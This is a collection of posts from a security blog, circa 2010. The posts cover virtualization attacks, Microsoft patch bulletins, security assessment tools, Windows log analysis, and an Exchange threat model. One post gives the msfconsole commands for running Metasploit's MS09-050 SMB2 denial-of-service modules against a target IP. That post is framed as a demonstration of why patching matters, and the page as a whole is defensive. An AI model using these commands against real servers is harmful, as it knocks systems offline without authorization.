Virtualization is considered to be the new renaissance in computing. Suddenly, all those over sized servers are put to great use by putting multiple Guest OS's on them. But running IT services in a virtualized environment brings a whole host of new opportunities for hackers.

In this article, we'll review the issue of Denial Of Service to a Virtualization enviroment:

One of the most important element of a Virtualization environment is the isolation. Since the host OS and the Guest OS machines run on the same hardware, and none should access each others resources - including memory, CPU time, video memory etc.


A lot of Virtualization implementations fail in proper isolation, and that can allow an attacker to mount different types of successful attacks.

The simplest one is a Denial of Service Attack. The compromised guest generates communication to memory address space attempting to breach the isolation walls and cause corruption of other Guest OS or the Host OS. It is very usual that early versions of a Virtualization platforms have vulnerabilities in the isolation mechanisms.

The following is an example of breach of the isolation wall on an unpatched Windows 2008 Hyper-V.

Please note that this attack only works on a default installation of Windows 2008, with no patches applied. So all your Virtualizaiton platforms should be fully patched

Talkback and comments are most welcome

Related posts
Hacking Virtual Machines Part 1 - Sniffing
Hacking Virtual Machines Part 2 - Environments Where Virtualization Lives

Microsoft has released 3 patches which repair a total of 11 vulnerabilities.

• 2 patches address Remote Code Execution vulnerabilities
• 1 patch addresses Elevation of Privilege vulnerabilities.

Critical
MS10-087 - Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)
MS10-088 - Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2293386)

Important
MS10-089 - Vulnerabilities in Forefront Unified Access Gateway (UAG) Could Allow Elevation of Privilege (2316074)

Microsoft cannot stress enough the importance of keeping your systems patched. And yet, server systems tend to drift from best practice, for several reasons

• The patch may fail the application that the server is running
• The patch will require reboot, which may cause unwanted downtime
• It's simply a hassle

But non-patched systems are a great target for an attacker. Even if the attacker doesn't gain permanent access to the network, he/she can cause nasty Denial of Service (DoS) on an unpatched server.
Here is the attack scenario

We will use a Windows 2008 target for this demonstration. The Win2008 is a good example because even if it was released in 2008, and we now have the R2 version, a lot of companies are just starting to implement it.

The attack is based on two well known vulnerabilities of Win2008 based on SRV2.SYS driver. In Metasploit, these exploits are know as:

• ms_09_050_smb2_negotiate_pidhigh
• ms_09_050_smb2_session_logoff

Both are Denial of Service type of attacks, so we'll use them without a payload.

To use these exploits, just fire up the msfconsole and type

msf > use exploit auxiliary/dos/windows/smb/ms_09_050_smb2_negotiate_pidhigh
msf auxiliary(ms_09_050_smb2_negotiate_pidhigh) > set rhost (Target IP address)
msf auxiliary(ms_09_050_smb2_negotiate_pidhigh) > exploit

You can do the same with the second exploit.

Here is the end result from a Metasploit command line point of view.


And here is the end result from a Windows 2008 Console point of view


Conclusion
Although this is just a demo type of exploit, it provides an excellent example of what happens to an unpatched server. Imagine that this was the web server running your Web Site. Now go and patch your systems :)

Talkback and comments are most welcome

October 2010 brings a HUGE update set. Microsoft released 16 patches which repair a total of 51 vulnerabilities:

• 10 patches address Remote Code Execution vulnerabilities,
• 3 patches address Elevation of Privilege vulnerabilities
• 1 patch addresses an Information Disclosure vulnerability
• 1 patch addresses a Denial of Service condition
• 1 patch addresses a information Tampering scenario

Critical
MS10-071 - Cumulative Security Update for Internet Explorer (2360131)
MS10-075 - Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679)
MS10-076 - Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132)
MS10-077 - Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841)

Important
MS10-072 - Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)
MS10-073 - Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957)
MS10-078 - Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986)
MS10-079 - Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194)
MS10-080 - Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211)
MS10-081 - Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011)
MS10-082 - Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)
MS10-083 - Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882)
MS10-084 - Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937)
MS10-085 - Vulnerability in SChannel Could Allow Denial of Service (2207566)

Moderate
MS10-074 - Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149)
MS10-086 - Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255)

March 2010, brings Microsoft an out-of-band patch by Microsoft with a total of ten vulnerabilities.

MS10-018 - Cumulative Security Update for Internet Explorer (980182)

The update covers nine privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

CVE-2010-0267 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0488 - Post Encoding Information Disclosure Vulnerability
CVE-2010-0489 - Race Condition Memory Corruption Vulnerability
CVE-2010-0490 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0491 - HTML Object Memory Corruption Vulnerability
CVE-2010-0492 - HTML Object Memory Corruption Vulnerability
CVE-2010-0494 - HTML Element Cross-Domain Vulnerability
CVE-2010-0805 - Memory Corruption Vulnerability
CVE-2010-0806 - Uninitialized Memory Corruption Vulnerability
CVE-2010-0807 - HTML Rendering Memory Corruption Vulnerability

Microsoft rates the Severity of the risk: Critical

The March update brings two advisories, with eight vulnerabilities covered.

MS10-016: Potential Remote Code Execution in

• Windows Movie Maker, covering one vulnerability:

CVE-2010-0265 (Buffer Overflow in Movie Maker and Producer).

Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.


MS10-017: Potential Remote Code Execution in

• Excel
• Excel Viewer
• Office for Mac
• Office Compatibility Pack,
• Excel Services

covering 7 vulnerabilities:
CVE-2010-0257 (Record Memory Corruption)
CVE-2010-0258 (Sheet Object Type Confusion)
CVE-2010-0260 (MDXTUPLE Record Heap Overflow)
CVE-2010-0261 (MDXSET Record Heap Overflow)
CVE-2010-0262 (FNGROUPNAME Record Uninitialized Memory)
CVE-2010-0263 (XLSX File Parsing)
CVE-2010-0264 (DbOrParamQry Record Parsing).

Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

When working on a security assessment, it is always helpful to use an automated tool that compares the key elements to the known best practices, and generates an overview result set.
Among other tools which can be used, Microsoft has released a tool titled Microsoft® Security Assessment Tool.

The assessment of this tool strives to identify the business risk of the organization and the security measures deployed to mitigate risk.
The assessment takes the form of a questionnaire, with Yes/No answers that cover the following areas

• Infrastructure - Infrastructure security collects information on how the networks function, what business processes (internal or external) it supports, how hosts are built and deployed, and how the network are managed and maintained.
  
• Applications - Applications security reviews applications within the organization and assess them from a security and availability standpoint. It examines technologies used within the environment, and reviews the high level procedures an organization can follow to help mitigate application risk
  
• Operations and People - This section reviews those processes within the enterprise governing corporate security policies, Human Resources processes, and employee security awareness and training. It also focuses on dealing with security as it relates to day-to-day operational assignments and role definitions.
  

The resulting comparison to best practices generates a summary report, as well as much more useful detailed report with areas which are lacking in comparison to the best practices. The report contains a lot of suggestions and links to related products and best practices published by Microsoft.


The MS Security Assessment Tool and it's report isn't a replacement for a full blown analysis, nor it can be a used as a one stop shop for a realistic security analysis. When performing a real analysis, an in-depth review of process and technology is needed.
MSAT is just a helpful tool to generate a security posture overview and some automated recommendations, so it is a nice start. For everything else, you will need to bring in expert professionals.


Talkback and comments are most welcome

Related posts
WMI Scanning - Excellent Security Tool
Risk Assessment with Microsoft Threat Assessment & Modeling
Google's Ratproxy Web Security Tool for Windows
Analysis of Windows Security Logs with MS Log Parser
How To - Malicious Web SIte Analysis Environment

When investigating an intrusion in a Windows system, one of the first places to start is the Windows security log. Security event log is also very useful for analysis when searching for anomalies and possible intrusions.

Reading through a Windows security log or any other log can be very difficult and time consuming, so a lot of companies have created their own tools to analyze windows event logs. But before you start going commerical, there is a tool that will get you going without any cost. Against all odds, it's a tool made by Microsoft!

The tool
The tool in question is Microsoft Log parser. Log parser is a command line tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system, and Active Directory. So, you can use it to analyze most structured text based files and the eventlog and AD on a single computer.

You can query remote computers on the network, as long as the credentials that Log parser is running under can access the data sources on the remote computers.

For Security Log, you need to run Log Parser as administrator
Note that this tool doesn't collect data from multiple computers, it just analyzes data in a single file/single computer repository.

The improved interface
In it's original form, Log Parser is a command line tool, so it is not the most user friendly tool in the world. Also, it has no way of saving/storing your prepared queries so you can invoke them later. But a promising developer named Dimce Kuzmanov created a free frontend to Log parser called Log Parser Lizard.


Log Parser Lizard enables you to store the prepared queries, and organizes them by type of data source on which you wish to do an analysis. It also includes the ability to export results to Excel, autogenerates charts on the result of the executed query, or ability to export the queried subset into the original format from which the analysis was performed.

Analyzing the Security Log with Log Parser Lizard
Using Log Parser Lizard for Security Log analysis is very simple. Choose the Queries button and select the Event Logs category, then create the queries that you need for your analysis. Here are some examples:

• SELECT * FROM SECURITY - simple dump all data from the security log
• SELECT EVENTID, COUNT(*) FROM SECURITY GROUP BY EVENTID - analyze what types of events appear in the security log and in what quantity
• SELECT * FROM SECURITY WHERE EVENTID='517' - find whether the security log was cleared in Win2000/XP/2003

After you create the query, choose the apropriate category, then click the 'Generate' button to execute the query. You can also graph the results by choosing the Chart->Visible option.

Conclusion
Analyzing the Security Log is always a useful approach to security controls, so you need to include it in your routine operations. And until you buy a SIEM system which will run an automatic and scheduled analysis, you should adopt a simple tool like Log Parser and Log Parser Lizard.


Talkback and comments are most welcome

Related posts
Tutorial - Mail Header Analysis for Spoof Protection
Reminder Tutorial - Enable Auditing on Windows 7
Windows 7 Full Disk Encryption with Truecrypt

In our previous post, we discussed the process of risk assessment assisted with Microsoft Threat Analysis and Modeling. While that post was purely theoretical, we are following up with a sample risk assessment of an IT service - Exchange 2007 infrastructure.


The Assessment is based on the prototype design of Microsoft Exchange Infrastructure, and all Exchange roles are treated as separate component/server. An Active Directory domain controller is added to the infrastructure since Exchange is integrated with it. Also, we added a Mailbox database role, just as an example that we can dissect the roles to the depth that we need.

The elements
The analysis contains the following components. Add them to the appropriate container within the MS TAM
User roles

• Exchange Admins - all administrators of the infrastructure
  
• Exchange Users - users of all Exchange services
  
• Exchange OWA Users - users of Online Web Access (webmail users)
  
• External mail users - users of other mail servers on the internet
  

Components with Service Roles

• Mailbox Server with Mailbox Server Service Role
• Hub Transport Server with Hub Transport Service Role
• Edge Transport Server with Edge Transport Service Role
• Client Access Server with Client Access Service Role
• Mailbox Database with Mailbox Database Service Role
• AD Domain Controller with Domain Controller Service Role

External dependencies

• External Mail Servers

Data
The data processed within this infrastructure is the following

• E-mail message - the main target, the incoming and outgoing e-mail messages.
  
• Exchange address - your e-mail address
  
• Exchange Configuration - All Exchange Roles Configuration - Stored within Domain Controller
• Login Credentials - username/password
  

Use cases
We have limited the use cases to the most basic and essential activities within this infrastructure. For each use case you will need to include the necessary calls to make it functional.

• Receive External E-mail
• Read E-mail Via POP3 /IMAP/OWA
• Send E-mail To Exchange User
• Exchange Admins Manages Exchange Accounts
• Send E-mail to External Address

Also, the assessment has additional relevancies

• Component utilizes Power Supply - The component is susceptible to power failures
• Component utilizes Communication Links - The component is dependent on functional LAN/WAN links to perform it's function
• Component utilizes Disk Capacity - The component stores data, and relies on disk storage, thus it can lose data of the disk fails, or it's capacity is filled.
  
• Component is a Physical Object - Component is a Physical Object and can be physically accessed, stolen or tampered with, or ultimately, it can fail

The analysis
After setting up these elements, you click the Tools->Generate Threats. Choose Generate Threats based on all of your calls, and use Intelligent Append.
The resulting set of risks can be confusing, since they are autogenerated and have generic names. You will need to read through them, and possibly merge one or more into one, since they can be addressing the same risk.

After you have finished the filtering, you need to define Probablity and Impact of the risk, and select the Risk Response as well as countermeasures from the offered set. This task is very time consuming and often difficult. You should always employ the assistance of a subject matter expert which can give you valuable input.

When you do this for every risk, you have finished the risk assessment The Report As we pointed out in the previous post, the most useful report template for risk analysis does not exist in the predefined reports, but can be downloaded here.
The final risk analysis report for this infrastructure can be downloaded here.
Also, you may benefit from the Comprehensive Report, which is included in the templates of MS TAM.

Conclusion
We hope that this example will help you to in the everyday use of MS TAM as a risk assessment tool.
We are also publishing the entire ACE Threat Model file of this example for download and use.
Please do not hesitate to contact Shortinfosec if you have any questions or issues


Talkback and comments are most welcome

Related posts
Risk Assessment with Microsoft Threat Assessment & Modeling
Reduce Risks in Projects with 'Deal Breakers'
Tutorial - Secure Web Based Job Application
Information Risks when Branching Software Versions